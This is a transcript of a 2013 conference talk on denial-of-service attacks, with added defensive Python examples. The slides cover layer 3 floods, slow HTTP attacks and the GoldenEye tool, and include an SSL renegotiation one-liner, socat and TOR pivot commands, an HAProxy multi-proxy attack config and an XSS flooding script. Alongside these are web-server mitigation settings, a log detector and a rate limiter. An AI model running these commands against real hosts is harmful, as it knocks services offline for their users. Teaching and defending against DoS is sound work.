Super Effective Denial of Service Attacks

Talk given on October 16th at Latinoware 2013 - Foz do Iguaçu - Brazil

This talk gave an introduction to denial-of-service attacks, going through attacks from layer 3 to layer 7, introduced the concept of using load-balancing software for attacks from multiple IPs (the Jericho Attack), introduced the GoldenEye tool, written in Python, and its Android (Java) version, and gave a brief introduction to mitigating layer 7 denial-of-service attacks on the most popular webservers.

Presentation Video (pt_BR) @ FISL 2014: https://www.youtube.com/watch?v=ozk0HiMjVNY

    1. Super Effective Denial of Service Attacks - Jan Seidl
    2. $ whoami
       Full Name: Jan Seidl. Origin: Rio de Janeiro, RJ – Brazil.
       Work: Technical Coordinator @ TI Safe; OpenSource contributor for PEV, Logstash; codes and snippets @ github.com/jseidl.
       Features: UNIX Evangelist/Addict/Freak (but no fanboy!); Python and C lover; coffee dependent; hates printers and social networks; proud DC Labs member.
       Footer (on every slide): Super Effective Denial-of-Service Attacks. SEIDL, Jan. Latinoware/2013 – Foz do Iguaçú, Brazil
    3. Agenda
       0x0 Introduction to Denial-of-Service
       0x1 Background: Layer 3 attacks
       0x2 Attacking Layer 7: Fundamentals
       0x3 Attacking Layer 7: Vectors & Tools
       0x4 WebServer DoS Mitigation 101
       0x5 Proxies (SOCKS/TOR) and Layer 7 attacks
       0x6 Jericho Attack Technique: Load-balancing attacks
       0x7 XSS D/DoS
       0x8 Size doesn't matter: Mobile-launched Denial-of-Service
       0x9 Demo/Video: GoldenEye MdoS Android Tool
       0xA Questions?
    4. Introduction to Denial-of-Service: What is denial of service?
    5. Introduction to Denial-of-Service: What is denial of service? "A denial-of-service attack (...) is an attempt to make a machine or network resource unavailable to its intended users." Source: Wikipedia/en_US
    6. Introduction to Denial-of-Service
    7. Introduction to Denial-of-Service: Result?
    8. Introduction to Denial-of-Service: Result?
    9. Introduction to Denial-of-Service
    10. Introduction to Denial-of-Service: Symptoms. Oddly low performance; unavailability of a given resource; unavailability of all resources.
    11. Introduction to Denial-of-Service: Recent Cases
    12. Introduction to Denial-of-Service: http://money.cnn.com/2012/09/27/technology/bank-cyberattacks/index.html
    13. Introduction to Denial-of-Service
    14. Introduction to Denial-of-Service: http://www.datacenterknowledge.com/archives/2009/08/06/twitter-is-latest-victim-in-series-of-attacks/
    15. Introduction to Denial-of-Service: http://nakedsecurity.sophos.com/2012/04/07/anonymous-attacks-home-office/
    16. Introduction to Denial-of-Service: http://usatoday30.usatoday.com/tech/news/story/2012-07-19/hactivism-anonymous-attacks/56464792/1
    17. Introduction to Denial-of-Service: http://olhardigital.uol.com.br/negocios/digital_news/noticias/ataques-ddos-cresceram-70-em-2012,-dizpesquisa
    18. Introduction to Denial-of-Service: Targets (OSI layer). Network (Layer 3): bandwidth consumption. Application (Layer 7): application or operating system resource consumption.
    19. Introduction to Denial-of-Service: Network (Layer 3): bandwidth consumption.
    20. Background: Layer 3 attacks. Popular Attacks: Ping Flood. "(...) is a simple denial-of-service attack where the attacker overwhelms the victim with ICMP Echo Request (ping) packets (...) The attacker hopes that the victim will respond with ICMP Echo Reply packets, thus consuming both outgoing bandwidth as well as incoming bandwidth." Source: Wikipedia/en_US
    21. Background: Layer 3 attacks. Popular Attacks: Smurf Attack
    22. Background: Layer 3 attacks. Popular Attacks: Smurf Attack
    23. Background: Layer 3 attacks. Popular Attacks: Smurf Attack
    24. Background: Layer 3 attacks. Popular Attacks: SYN Flood
    25. Background: Layer 3 attacks. Popular Attacks: SYN Flood
    26. Background: Layer 3 attacks. Popular Attacks: Teardrop Attack. "When the sum of the offset and size of one fragmented packet differ from that of the next fragmented packet, the packets overlap, and the server attempting to reassemble the packet can crash, especially if it is running an older operating system that has this vulnerability." http://www.juniper.net/techpubs/software/junos-es/junos-es93/junos-es-swconfigsecurity/understanding-teardrop-attacks.html
    27. Background: Layer 3 attacks. Popular Attacks: Teardrop Attack
    28. Background: Layer 3 attacks. Popular Attacks: Teardrop Attack
    29. Background: Layer 3 attacks. Popular Attacks: Teardrop Attack
    30. Background: Layer 3 attacks. Popular Attacks: Teardrop Attack
    31. Attacking Layer 7: Fundamentals. Application (Layer 7): application or operating system resource consumption.
    32. Attacking Layer 7: Fundamentals. Focus. Layer 3: exhaust bandwidth. Layer 7: exhaust application or operating system key resources.
    33. Attacking Layer 7: Fundamentals. Stealthiness. Layer 3: high network noise (noisy attack). Layer 7: low network noise, might emulate legitimate requests.
    34. Attacking Layer 7: Fundamentals. Efficiency. Layer 3: requires lots of participants for a significant outage; may be blocked by sparring. Layer 7: sometimes only one machine can cause damage; difficult to block.
    35. Attacking Layer 7: Fundamentals. Mitigation. Layer 3: large link, connection limiting, rate limiting, sparring. Layer 7: ?
    36. Attacking Layer 7: Fundamentals. Layer 7 attack targets: intense CPU, disk I/O & swapping operations, long/slow/complex queries; finite application resources: maximum socket limits, maximum memory limits, disk space etc.
    37. Attacking Layer 7: Vectors & Tools
    38. Attacking Layer 7: Vectors & Tools. Intense CPU usage: SSL Renegotiation / SSL Handshake Attack. 15% more processing power needed on the server than on the client to establish the handshake. In the wild since 2003; still affects most implementations. Found by the THC group (www.thc.org) in 2011.
    39. Attacking Layer 7: Vectors & Tools. Intense CPU usage: SSL Renegotiation / SSL Handshake Attack. Tool: THC-SSL-DOS <http://www.thc.org/thc-ssl-dos/>, or:
       thc-ssl-dosit() { while :; do (while :; do echo R; done) | openssl s_client -connect 127.0.0.1:443 2>/dev/null; done }
       for x in `seq 1 100`; do thc-ssl-dosit & done
    40. Attacking Layer 7: Vectors & Tools. Intense CPU usage: SSL Renegotiation / SSL Handshake Attack. Affects any TLS/SSL-secured protocol: HTTPS, SMTPS, POP3S, database secure ports etc. Mitigation? Turning off SSL renegotiation might help, but does not solve it; SSL accelerators might help, but also don't 100% solve it; iptables mitigation: http://vincent.bernat.im/en/blog/2011-ssl-dos-mitigation.html
    41. Attacking Layer 7: Vectors & Tools. Intense CPU usage: Apache Range Header Attack. Parallel requests for small GZIP'ed content parts force the webserver to perform several parallel compression operations = high load. Discovered in 2011 (CVE-2011-3192).
    42. Attacking Layer 7: Vectors & Tools. Intense CPU usage: Apache Range Header Attack. Tools: killapache.pl <http://seclists.org/fulldisclosure/2011/Aug/175>; slowhttptest <http://code.google.com/p/slowhttptest/>
    43. Attacking Layer 7: Vectors & Tools. Intense CPU usage: Apache Range Header Attack. Mitigation: SetEnvIf or mod_rewrite (ref: http://httpd.apache.org/security/CVE-2011-3192.txt); use a WAF (Web Application Firewall); update Apache to version 2.2.21 or greater.
    44. Attacking Layer 7: Vectors & Tools. Connection slots abuse: HTTP Slow Attacks (Slow Headers, Slow Post, Slow Read). Read or send data in small chunks, with an interval between reads / writes. Waiting for the full request is part of the web server's nature.
    45. Attacking Layer 7: Vectors & Tools. Connection slots abuse: HTTP Slow Attacks. Slow Headers: send request headers 'slowly'. Slow Post: send the request POST body (post data) 'slowly'. Slow Read: small TCP window size to force slow response reading.
    46. Attacking Layer 7: Vectors & Tools. Connection slots abuse: HTTP Slow Attacks. Slow Headers: send request headers 'slowly':
       GET / HTTP/1.1\r\n
       /* sleep(1) */
       Connection: keep-alive\r\n
       /* sleep(1) */
       ...
    47. Attacking Layer 7: Vectors & Tools. Connection slots abuse: HTTP Slow Attacks. Slow Post: send the request POST body (post data) 'slowly':
       Content-Type: application/x-www-form-urlencoded
       Content-Length: 512
       Accept: text/html;q=0.9,text/plain;q=0.8

       foo=bar /* sleep(1) */
       bar=baz /* sleep(1) */
       baz=foo /* sleep(1) */
       ...
    48. Attacking Layer 7: Vectors & Tools. Connection slots abuse: HTTP Slow Attacks. Slow Read: small TCP window size to force slow response reading:
       /* pseudocode */
       int len = 1;
       while (data = read(sock, buffer, len)) {
           sleep(5);
           …
       }
    49. Attacking Layer 7: Vectors & Tools. Connection slots abuse: HTTP Slow Attacks. Tools: Slow Headers: Slowloris, slowhttptest, OWASP HTTP Post Tool. Slow Post: RUDY, slowhttptest, OWASP HTTP Post Tool. Slow Read: slowhttptest.
    50. Attacking Layer 7: Vectors & Tools. Connection slots abuse: HTTP Slow Attacks. Mitigation: Slow Headers: request timeout (Apache's mod_reqtimeout), WAF. Slow Post: request timeout, WAF. Slow Read: disable pipelining and oddly slow window sizes, limit the maximum request time, WAF. Good article on slow attack mitigation: https://community.qualys.com/blogs/securitylabs/2011/11/02/how-to-protect-against-slow-http-attacks
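The mitigation slides 44-50 name for slow-headers attacks is a request read timeout (Apache's mod_reqtimeout, configured with RequestReadTimeout on slide 58). The following is an added example, not code from the talk or from GoldenEye, that shows what such a timeout does from the server's side: `read_request_head` waits at most `HEADER_DEADLINE` seconds for the blank line that ends the header block and otherwise gives the connection slot back. The function names, the 0.5 s deadline, the 8 KiB header cap and the two simulated clients are this example's own assumptions; the clients run against a local socketpair, so nothing leaves the host.

```python
import select
import socket
import threading
import time

# Added example: the request-read deadline behind Apache's RequestReadTimeout
# (mod_reqtimeout), written as a small reader function. HEADER_DEADLINE,
# MAX_HEADER_BYTES and the two simulated clients are this example's own
# assumptions, not values from the talk.

HEADER_DEADLINE = 0.5     # seconds allowed for the complete header block
MAX_HEADER_BYTES = 8192   # refuse oversized header blocks as well


def read_request_head(conn, deadline=HEADER_DEADLINE, max_bytes=MAX_HEADER_BYTES):
    """Read until the blank line that ends the HTTP header block.

    Returns the raw header block (bytes, terminator stripped), or None when the
    client has not delivered it within `deadline` seconds (the slow-headers
    pattern), closed early, or sent more than `max_bytes`.
    """
    buf = b""
    end = time.monotonic() + deadline
    while b"\r\n\r\n" not in buf:
        remaining = end - time.monotonic()
        if remaining <= 0:
            return None                    # deadline hit: give the slot back
        readable, _, _ = select.select([conn], [], [], remaining)
        if not readable:
            return None                    # nothing arrived before the deadline
        chunk = conn.recv(1024)
        if not chunk:
            return None                    # peer closed before finishing
        buf += chunk
        if len(buf) > max_bytes:
            return None                    # header block too large
    return buf.split(b"\r\n\r\n", 1)[0]


def parse_headers(head):
    """Split a raw header block into (request line, {lowercase name: value})."""
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def simulate(client_behaviour):
    """Run one simulated client against read_request_head over a socketpair.

    client_behaviour(sock) runs in a thread and writes whatever it likes; the
    return value is what the server side got (header block or None).
    """
    server_side, client_side = socket.socketpair()
    worker = threading.Thread(target=client_behaviour, args=(client_side,), daemon=True)
    worker.start()
    try:
        return read_request_head(server_side)
    finally:
        server_side.close()                # a real server would drop the connection here
        worker.join(timeout=5)
        client_side.close()


def fast_client(sock):
    # Constructed well-behaved request: the whole header block in one write.
    sock.sendall(b"GET / HTTP/1.1\r\nHost: example.test\r\nConnection: keep-alive\r\n\r\n")


def slow_headers_client(sock):
    # Constructed slow-headers client (slide 46): one byte at a time with a pause
    # between writes, so the terminating blank line never arrives in time.
    request = b"GET / HTTP/1.1\r\nHost: example.test\r\nX-Slow: 1\r\n\r\n"
    try:
        for byte in request:
            sock.send(bytes([byte]))
            time.sleep(0.1)
    except OSError:
        pass                               # server gave up and closed: expected


if __name__ == "__main__":
    print("fast client ->", parse_headers(simulate(fast_client)))
    print("slow client ->", simulate(slow_headers_client))
```

The deadline bounds how long one idle worker can be held by a single connection; the byte cap bounds memory per connection. Both are what the Apache and nginx directives on slides 58-59 set, and a WAF adds the same limits in front of servers that lack them.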
    51. Attacking Layer 7: Vectors & Tools. Connection slots abuse: HTTP KeepAlive + NoCache. Keep connections open and force cache regeneration. First PoC: HULK (HTTP Unbearable Load King), created in May 2012 by Barry Shteiman. <http://www.sectorix.com/2012/05/17/hulk-web-server-dos-tool/>
    52. Attacking Layer 7: Vectors & Tools. Connection slots abuse: HTTP KeepAlive + NoCache: HULK. Highly effective against IIS, Apache & reverse proxies. Caveat: Python's urllib2 always sends headers in the same order. SpiderLabs: ModSecurity rule to mitigate urllib2 attacks (HULK) (http://blog.spiderlabs.com/2012/05/hulk-vs-thor-applicationdos-smackdown.html)
    53. Attacking Layer 7: Vectors & Tools. Randomization FTW!
    54. Attacking Layer 7: Vectors & Tools. Connection slots abuse: HTTP KeepAlive + NoCache + Randomness: GoldenEye. Author: Me! :) Initially born as a HULK fork due to its fingerprinting weakness; transformed further into a new, independent HTTP DoS tool; born to test WAF blocking abilities under random and semi-natural payloads. Available at https://github.com/jseidl/GoldenEye
    55. Attacking Layer 7: Vectors & Tools. Connection slots abuse: HTTP KeepAlive + NoCache + Randomness: GoldenEye. Main features: GET, POST or random HTTP methods; random header quantity; random header content with legitimate values as per RFC; better random block function to avoid fingerprinting.
       Footer on this slide: Super Effective Denial-of-Service Attacks. SEIDL, Jan. Hackers to Hackers Conference 2012 – São Paulo, Brasil
    56. Attacking Layer 7: Vectors & Tools. Mitigation. Granular page permissions: filter POST where not needed; filter querystring parameters where not needed. ProxyCache: use caching proxies (e.g. Varnish) and disable cache reload. KeepAlive & Timeouts: tune KeepAlive, TimeOut & KeepAliveTimeOut (Apache) and the equivalents in other webservers.
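HULK and GoldenEye (slides 51-56) leave traces an access log exposes: a high per-source request rate, cache-busting query strings on nearly every request and, for GoldenEye's randomised headers, a User-Agent that changes between requests from the same address. The following added example, which is not the talk's code and not part of GoldenEye, scores sources in a constructed Apache combined-format log on those traits and also counts non-GET/POST methods, the trait the mod_rewrite rule on slide 85 blocks. The thresholds, the helper names and the sample log lines are this example's assumptions, chosen for the demonstration rather than taken from the talk.

```python
import re
from collections import defaultdict
from datetime import datetime

# Added example: scoring sources in an Apache "combined" access log for the
# traits of HULK/GoldenEye-style floods (keep-alive, cache-busting query
# strings, randomised headers). Thresholds and log lines are this example's
# constructed assumptions, not figures from the talk.

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FORMAT)
    return rec


def profile_sources(lines):
    """Aggregate per-IP traits: request count, rate, query-string share,
    distinct User-Agents and non-GET/POST method count."""
    per_ip = defaultdict(lambda: {"n": 0, "with_query": 0, "uas": set(),
                                  "odd_methods": 0, "first": None, "last": None})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                       # skip unparseable lines instead of crashing
        s = per_ip[rec["ip"]]
        s["n"] += 1
        if "?" in rec["path"]:
            s["with_query"] += 1           # cache-busting: a fresh query string per request
        s["uas"].add(rec["ua"])
        if rec["method"] not in ("GET", "POST"):
            s["odd_methods"] += 1
        s["first"] = rec["ts"] if s["first"] is None else min(s["first"], rec["ts"])
        s["last"] = rec["ts"] if s["last"] is None else max(s["last"], rec["ts"])
    profiles = {}
    for ip, s in per_ip.items():
        span = max((s["last"] - s["first"]).total_seconds(), 1.0)
        profiles[ip] = {
            "requests": s["n"],
            "rate": s["n"] / span,         # requests per second over the span seen
            "query_share": s["with_query"] / s["n"],
            "ua_count": len(s["uas"]),
            "odd_methods": s["odd_methods"],
        }
    return profiles


def flag_sources(profiles, min_requests=20, max_rate=5.0, max_query_share=0.8, max_uas=3):
    """Return {ip: [reasons]} for sources showing at least two flood traits.

    One signal alone is weak (a busy NAT also has many requests); the
    combination of rate, near-total cache busting and a client that rotates
    its User-Agent is what separates a GoldenEye/HULK run from normal traffic.
    """
    flagged = {}
    for ip, p in profiles.items():
        if p["requests"] < min_requests:
            continue
        reasons = []
        if p["rate"] > max_rate:
            reasons.append("rate %.1f req/s" % p["rate"])
        if p["query_share"] > max_query_share:
            reasons.append("query strings on %d%% of requests" % (100 * p["query_share"]))
        if p["ua_count"] > max_uas:
            reasons.append("%d distinct User-Agents" % p["ua_count"])
        if p["odd_methods"]:
            reasons.append("%d non-GET/POST requests" % p["odd_methods"])
        if len(reasons) >= 2:
            flagged[ip] = reasons
    return flagged


def sample_log():
    """Constructed log: one flooding source and one ordinary browser."""
    base = "[16/Oct/2013:10:00:%02d -0300]"
    lines = []
    for i in range(60):                    # 60 GETs over six seconds, rotating UA, random-looking query
        lines.append('203.0.113.7 - - %s "GET /index.php?%08x HTTP/1.1" 200 5120 "-" "Agent-%d"'
                     % (base % (i // 10), (i * 2654435761) & 0xFFFFFFFF, i % 7))
    for i in range(5):                     # plus a few HEADs from the same source
        lines.append('203.0.113.7 - - %s "HEAD /index.php?%08x HTTP/1.1" 200 - "-" "Agent-%d"'
                     % (base % i, i * 7919, i % 7))
    for i in range(5):                     # a normal visitor: one page every two seconds
        lines.append('198.51.100.20 - - %s "GET /page%d.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"'
                     % (base % (i * 2), i))
    return lines


if __name__ == "__main__":
    for ip, reasons in flag_sources(profile_sources(sample_log())).items():
        print(ip, "->", "; ".join(reasons))
```

The output of such a script is a candidate list for the connection limits and WAF rules the next slides describe, not a block list by itself: as slide 77 points out, a source that is really many proxies behind a load balancer will spread these traits across addresses, which is why the per-IP view should be complemented by per-URL and per-User-Agent aggregates.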
    57. WebServer DoS Mitigation 101
    58. WebServer DoS Mitigation 101. Apache: LimitRequestFields, LimitRequestFieldSize, LimitRequestBody, LimitRequestLine, LimitXMLRequestBody, TimeOut, KeepAliveTimeOut, ListenBackLog, MaxRequestWorkers [core]; RequestReadTimeout [mod_reqtimeout]. Source: https://community.qualys.com/blogs/securitylabs/2011/11/02/how-to-protect-against-slow-http-attacks
    59. WebServer DoS Mitigation 101. Nginx: client_max_body_size, client_body_buffer_size, client_header_buffer_size, large_client_header_buffers, client_body_timeout, client_header_timeout [core]. Modules: HttpLimitReqModule, HttpLimitZoneModule. Source: https://community.qualys.com/blogs/securitylabs/2011/11/02/how-to-protect-against-slow-http-attacks
    60. WebServer DoS Mitigation 101. IIS 6 & 7. IIS 6: connectionTimeout, HeaderWaitTimeout, MaxConnections. IIS 7: <RequestLimits> maxAllowedContentLength, maxQueryString, maxUrl; <headerLimits>; <Limits>/<WebLimits> connectionTimeout, headerWaitTimeout, minBytesPerSecond. Source: https://community.qualys.com/blogs/securitylabs/2011/11/02/how-to-protect-against-slow-http-attacks
    61. WebServer DoS Mitigation 101. USE A WEB APPLICATION FIREWALL (WAF): ModSecurity (Apache / Nginx) http://www.modsecurity.org/; NAXSI (Nginx) http://code.google.com/p/naxsi/
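Slide 59 lists nginx's HttpLimitReqModule and HttpLimitZoneModule; the admission decision such modules make is a per-client bucket that refills at a fixed rate and tolerates a bounded burst. The following is an added example, not nginx code and not from the talk: a token bucket keyed by source IP, replayed over constructed traffic. `RateLimiter`, its `rate` and `burst` parameters and the sample timestamps are this example's assumptions; nginx's own implementation is a leaky bucket with a millisecond "excess" counter, but a burst of back-to-back requests is admitted or refused in the same spirit.

```python
import time
from collections import defaultdict

# Added example: a per-client token bucket, the mechanism behind nginx's
# limit_req (HttpLimitReqModule) and similar rate limiters. The class, its
# parameters and the sample traffic are this example's constructed assumptions.


class RateLimiter:
    def __init__(self, rate, burst, clock=time.monotonic):
        self.rate = float(rate)        # tokens added per second per client
        self.burst = float(burst)      # bucket capacity: back-to-back requests that pass
        self.clock = clock
        self._buckets = {}             # ip -> (tokens, time of last refill)

    def allow(self, ip, now=None):
        """True if the request from ip is admitted, False if it should get a 503."""
        now = self.clock() if now is None else now
        tokens, last = self._buckets.get(ip, (self.burst, now))
        tokens = min(self.burst, tokens + (now - last) * self.rate)   # refill since last visit
        if tokens >= 1.0:
            self._buckets[ip] = (tokens - 1.0, now)
            return True
        self._buckets[ip] = (tokens, now)
        return False


def replay(limiter, requests):
    """Run constructed (timestamp, ip) tuples through the limiter in time order.

    Returns {ip: {"allowed": n, "rejected": m}}.
    """
    out = defaultdict(lambda: {"allowed": 0, "rejected": 0})
    for ts, ip in sorted(requests):
        out[ip]["allowed" if limiter.allow(ip, now=ts) else "rejected"] += 1
    return dict(out)


def sample_traffic():
    """Constructed: a flooding client fires 10 requests in 100 ms, then 10 more
    one second later; a normal client sends one request every two seconds."""
    reqs = [(i * 0.01, "203.0.113.7") for i in range(10)]
    reqs += [(1.0 + i * 0.01, "203.0.113.7") for i in range(10)]
    reqs += [(i * 2.0, "198.51.100.20") for i in range(5)]
    return reqs


if __name__ == "__main__":
    print(replay(RateLimiter(rate=5, burst=4), sample_traffic()))
```

With `rate=5` and `burst=4` the flooding client gets four requests through per burst and the rest are refused, while the slow visitor is never touched. The caveat the talk itself raises on slide 77 applies: a limiter keyed on source address is exactly what a load-balanced, multi-origin attack is built to evade, so it is one layer of the mitigation, combined with the timeouts and WAF rules on the surrounding slides rather than a substitute for them.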
    62. Proxies and Layer 7 attacks
    63. Proxies and Layer 7 attacks. Layer 3: bad to attack through proxies, as they usually have low bandwidth and you might get banned from them. Layer 7: requires low bandwidth; low network noise; not degraded by low output.
    64. Proxies and Layer 7 attacks. Why use proxies in HTTP attacks? Simple answer: geographic location at your will; different source IPs; can provide high anonymity; largely available on the internet.
    65. Proxies and Layer 7 attacks. Attack pivoting by proxies. Tool: socat, Multipurpose Relay, http://www.dest-unreach.org/socat/. Also with SSL support: HTTPS, IMAPS, POPS, LDAPS.
    66. Proxies and Layer 7 attacks. Attack pivoting by proxies: regular proxies
       # socat TCP4-LISTEN:80 PROXY:<PROXY_IP>:<VICTIM_IP>:80,proxyport=<PROXY_PORT>
       # echo "127.0.0.1 <VICTIM_HOST>" >> /etc/hosts
       # ./goldeneye.py http://<VICTIM_HOST>/index.php -t 1000 -m get
    67. Proxies and Layer 7 attacks. Attack pivoting by proxies: TOR
       # socat TCP4-LISTEN:80,fork SOCKS4A:localhost:<VICTIM_IP>:80,socksport=9052
       # echo "127.0.0.1 <VICTIM_HOST>" >> /etc/hosts
       # ./goldeneye.py http://<VICTIM_HOST>/index.php -t 1000 -m get
    68. Proxies and Layer 7 attacks. Bonus: Multi-TOR. The TOR client supports spawning as many instances and opening as many circuits as necessary.
       tor --RunAsDaemon 1 --CookieAuthentication 0 --HashedControlPassword "pwd" --ControlPort 4444 --PidFile torN.pid --SocksPort 5090 --DataDirectory data/torN
       Tool: Multi-TOR https://github.com/jseidl/Multi-TOR/. Example: ./multi-tor.sh 5 # opens 5 TOR instances
    69. Proxies and Layer 7 attacks. Mitigating TOR with TORBlock: blocking TOR-sourced access. TORBlock: iptables-based blocking. Tool: https://github.com/jseidl/torblock
    70. Load Balancing Attacks: Meet Jericho
    71. Load Balancing Attacks. Starring: HAProxy, "The Reliable, High Performance TCP/HTTP Load Balancer". REQUEST → HAPROXY → { SERVER A, SERVER B, SERVER C }
    72. Load Balancing Attacks. 'Load-balanced' attacks anatomy. Attacker: 1. Open lots of socat tunnels to the victim, each one from a different proxy (regular, TOR or both). 2. Put the local port addresses (the socat'ed ones) on HAProxy. 3. Place the victim's domain in /etc/hosts. 4. Attack normally from your favorite tool.
    73. Load Balancing Attacks. 'Load-balanced' attacks anatomy (HAProxy configuration):
       listen ddos 0.0.0.0:80
           mode tcp
           balance roundrobin
           server inst1 localhost:8080
           server inst2 localhost:8081
           server inst3 localhost:8082
           server inst4 localhost:8083
           …
    74. Load Balancing Attacks. 'Load-balanced' attacks anatomy
    75. Load Balancing Attacks. 'Load-balanced' attacks anatomy (diagram): Attacker → HAProxy → Proxy 1 … Proxy 7 → Victim
    76. Load Balancing Attacks. 'Load-balanced' attacks anatomy
    77. Load Balancing Attacks. Dangers of 'load-balanced' attacks? Bypass connection limiting; DoS → DDoS; multiple origin IPs; origins can be from multiple countries.
    78. Load Balancing Attacks. Dangers of 'load-balanced' attacks?
    79. Load Balancing Attacks. More about the Jericho Attack Technique: http://www.slideshare.net/jseidl/slides-the-jerichoattackperspective
    80. XSS D/DoS. What if an XSS flaw could turn your visitors into D/DoS clients?
       <script>
       function DDoS() {
         a = new Date()
         unixepoch = a.getTime()
       }
       elm = document.createElement("img")
       victimURL = "http://10.1.1.114/"
       elm.src = victimURL+"?"+unixepoch
       setInterval("DDoS()",1);
       </script>
    81. Mobile-launched Denial-of-Service. PoC Tool: GoldenEye Mobile
    82. Mobile-launched Denial-of-Service. Objective: test whether mobile devices alone could conduct a successful DoS attack; test whether equipment and configurations are able to deter DoS attacks from mobile platforms.
    83. Mobile-launched Denial-of-Service. Android limitations: max 128 threads (Android 2.1); maximum number of concurrent sockets per thread: 30 (>30: too many open files). Can we get better results if the device is 'rooted' (sysctl)?
    84. Mobile-launched Denial-of-Service. Firepower: 5 min test on an Apache webserver, default configuration, in a Debian 6 virtual machine, also with default configuration. CPU usage: u5.85 s4.52 cu0 cs0 - 2.37% CPU load. Low CPU fingerprint. Server overloaded (a.k.a. down). https://github.com/jseidl/GoldenEye-Mobile
    85. Mobile-launched Denial-of-Service. GoldenEye Mobile: Mitigation. GoldenEye Mobile uses the HEAD method for maximum speed. Easily blocked (module: mod_rewrite):
       RewriteEngine on
       RewriteCond %{THE_REQUEST} !^(GET|POST) /.* HTTP/1.1$
       RewriteRule .* - [F]
       mod_security:
       SecFilterSelective REQUEST_METHOD "!^(GET|POST)$" "deny,auditlog,status:405"
    86. Demo: DoS Fun. GoldenEye Mobile DoS Android Tool Demo! http://bit.ly/GoldenEyeMDOS
    87. Questions?
    88. Thanks! – To Peace!
    89. Thanks! Thanks for your time! jseidl@wroot.org / http://wroot.org, https://github.com/jseidl, http://www.slideshare.net/jseidl, @jseidl
